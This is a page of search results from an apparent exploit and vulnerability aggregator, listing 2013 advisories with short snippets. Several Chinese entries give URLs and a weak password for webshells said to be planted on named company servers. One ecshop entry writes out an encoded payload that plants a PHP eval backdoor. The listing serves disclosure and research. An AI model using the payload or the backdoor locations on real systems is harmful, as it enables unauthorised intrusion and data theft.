Lucene search
K

2126 matches found

securityvulns
securityvulns
added 2013/07/15 12:0 a.m.43 views

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: ============= You ha...

Exploits0
seebug.org
seebug.org
added 2013/07/08 12:0 a.m.57 views

用友软件开发管理平台IIS写权限导致可获取服务器webshell

简要描述: 见说明 详细说明: http://ufsdp-borrow.ufsoft.com.cn/cmd.asp http://ufsdp-borrow.ufsoft.com.cn/1937cN.txt 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/07/08 12:0 a.m.17 views

用友畅捷服务联盟4S店被上传webshell(shell存在弱口令)

简要描述: 见说明 详细说明: 用友畅捷服务联盟4S店(企通服务)官网 检测过程中检测到一aspx马,弱口令直接进 http://www.uftong.com/Admin/ManagerTestimony/ftb.image.aspx 密码admin --! 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/07/08 12:0 a.m.17 views

用友研发实践共享平台遍历漏洞发现存在webshell(IIS解析漏洞)

简要描述: 见说明 详细说明: http://ufsdp-zjsj.ufida.com.cn/index.aspx 遍历漏洞地址http://ufsdp-zjsj.ufida.com.cn/files/ 在这个页面发现有前辈留下的痕迹,顺藤摸瓜,找到了前辈Fck上传后其中一个未解析完整的马,得到一句话密码为 利用前辈铺好的路,直接菜刀连接 http://ufsdp-zjsj.ufida.com.cn/files/s.asp;.jpg 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/07/01 12:0 a.m.23 views

用友软件IIS写权限(PUT)导致可获取webshell控制服务器

简要描述: 1年后,用友再次爆动,菜鸟一枚,只会put,wooyun那些屌丝中的神级BOOS就莫喷了,绕道吧!听说可以换QB了,主要上来弄QB的.穷屌丝就这点追求了 详细说明: http://summit.ufida.com/ 2012年8月份检测过一次,存在,现在又来了,呵呵 PUT,大家懂得! WooYun: 用友分站漏洞利用入侵 漏洞为什么依然存在? 漏洞证明:...

7.1AI score
Exploits0
myhack58
myhack58
added 2013/06/14 12:0 a.m.34 views

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

0.2AI score
Exploits0
myhack58
myhack58
added 2013/06/13 12:0 a.m.17 views

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary PHP is a very popular Web development language on the Internet many Web applications are using PHP development. And in the use of PHP development of Web applications, PHP file include vulnerability is a Common Vulnerability. The use of PHP file include vulnerabilities intrusion website is...

0.9AI score
Exploits0
myhack58
myhack58
added 2013/06/03 12:0 a.m.37 views

php LFI to read the php file source code as well as directly post webshell-vulnerability warning-the black bar safety net

Recently in the busy defcon topic training where a set of topics where there is a foreigner to write it is mentioned in the LFI, another tips The original text please refer to the PS: the skill is not a new technology bull God has certainly been with got bored, so when passing on the line =,= I...

7.5AI score
Exploits0
seebug.org
seebug.org
added 2013/05/30 12:0 a.m.25 views

ecshop最新补丁含有webshell,请各位站长注意!

简要描述: ecshop最新(2013年5月6日)补丁含有后门,请各位站长注意!补丁地址http://bbs.ecshop.com/viewthread.php?tid=1129622 下载过的请及时处理。同时希望官方以公告方式告知! 详细说明: 官方已经停止了补丁的下载。我是从第三方 下载的补丁ecmoban.com下载的补丁 我开始以为是第三方故意写的后门于是联系了 ecmoban的人员。确定是ec论坛被挂马导致的 shell位置...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/05/29 12:0 a.m.16 views

ecshop后台拿weshell

简要描述: ecshop后台拿webshell 详细说明: 模板管理--语言项编辑 如:user.php 搜索:状态 插入$$fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4 访问http://localhost/ecshop/languages/zhcn/user.php 一句话:http://localhost/ecshop/languages/zhcn/fuck.php 漏洞证明:...

7.1AI score
Exploits0
Kitploit
Kitploit
added 2013/05/23 8:55 p.m.15 views

[jSQL Injection v0.4] Java tool for automatic database injection

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform Windows, Linux, Mac OS X, Solaris. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic...

7.6AI score
Exploits0
myhack58
myhack58
added 2013/05/18 12:0 a.m.16 views

Meng Jie home textile jboss configuration improper has been invaded many times-the vulnerability and early warning-the black bar safety net

Estimated you also have seen, just haven't submitted. Supposedly now is a positive card manufacturers, the author fixes it. Detailed description: Information leak: http://amb.mendale.com.cn/status?full=true From the figure we can see that in my screenshot, still someone in to access the...

Exploits0
exploitpack
exploitpack
added 2013/05/13 12:0 a.m.14 views

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities Title: ====== Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities Date: ===== 2013-04-21 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=932 VL-ID: ===== 932 Common Vulnerability Scoring System:...

0.4AI score
Exploits0
myhack58
myhack58
added 2013/05/13 12:0 a.m.37 views

cmseasy{easy through CMS}v5. 5 arbitrary file upload vulnerability in the simple analysis of reference using the method-vulnerability warning-the black bar safety net

Yesterday found someone storm out of a cmseasy v5. 5 arbitrary file upload vulnerability, it also comes with the exp. Exploit the vulnerability can directly Upload a webshell and other malicious files, the harm is huge and currently the official has not been any patches here to do some simple...

7.3AI score
Exploits0
Exploit DB
Exploit DB
added 2013/05/13 12:0 a.m.24 views

File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities

Title: ====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: =============...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2013/05/11 12:0 a.m.13 views

金蝶网站可执行任意命令,root权限

简要描述: 金蝶网站可执行任意命令,root权限。 详细说明: 金蝶网站用户登录的地方http://id.kingdee.com/存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取),进而可能威胁到用户的数据安全。因为是以root权限执行任意命令,可获得服务器完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 漏洞证明: 用IE浏览器访问如下链接:...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2013/05/08 12:0 a.m.36 views

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

0.3AI score
Exploits0
Exploit DB
Exploit DB
added 2013/05/08 12:0 a.m.72 views

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

7.4AI score
Exploits0
Vulnerability Lab
Vulnerability Lab
added 2013/05/04 12:0 a.m.15 views

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

Document Title: =============== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=939 Release Date: ============= 2013-05-04 Vulnerability Laboratory ID VL-ID: ====================================...

0.4AI score
Exploits0
Exploit DB
Exploit DB
added 2013/04/25 12:0 a.m.44 views

Hornbill Supportworks ITSM 1.0.0 - SQL Injection

Summary SQL Injection Vulnerability in ITSM component of Hornbill Supportworks Application CVE number: CVE-2013-2594 Impact: High Vendor homepage: http://www.hornbill.com Vendor notified: 19/11/2012 Vendor response: This issue has reportedly been fixed but the vendor refused to give version...

7.5CVSS6.5AI score0.02638EPSS
Exploits6
Rows per page
Query Builder